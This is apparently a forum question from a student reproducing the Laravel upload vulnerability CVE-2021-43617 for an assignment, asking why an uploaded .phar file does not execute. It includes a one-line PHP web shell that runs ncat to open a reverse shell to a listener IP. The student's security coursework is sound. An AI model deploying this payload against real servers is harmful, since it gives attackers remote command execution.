Questions about error CVE-2021-43617 of laravel
Currently I am trying to reproduce laravel's error CVE-2021-43617 for my assignment. But I have a problem that When I uploaded the .phar file and followed the link: 127.0.0.1:8000/images/shell.phar it was commented on. Although I used the .php file, it was successful. I don't know where I went wrong expecting people to help.
file .phar
<?php system("ncat -e /bin/sh/ 192.168.111.128 1234"); ?> 

Code commented
enter image description here
I tried here but it only shows out the HTML code and it doesn't execute the command sent to that IP
I also tried to create 1 php file then used basic code to build the .phar file and use php {namefile}.php but it was just like above
expecting people to help. Thank you very much
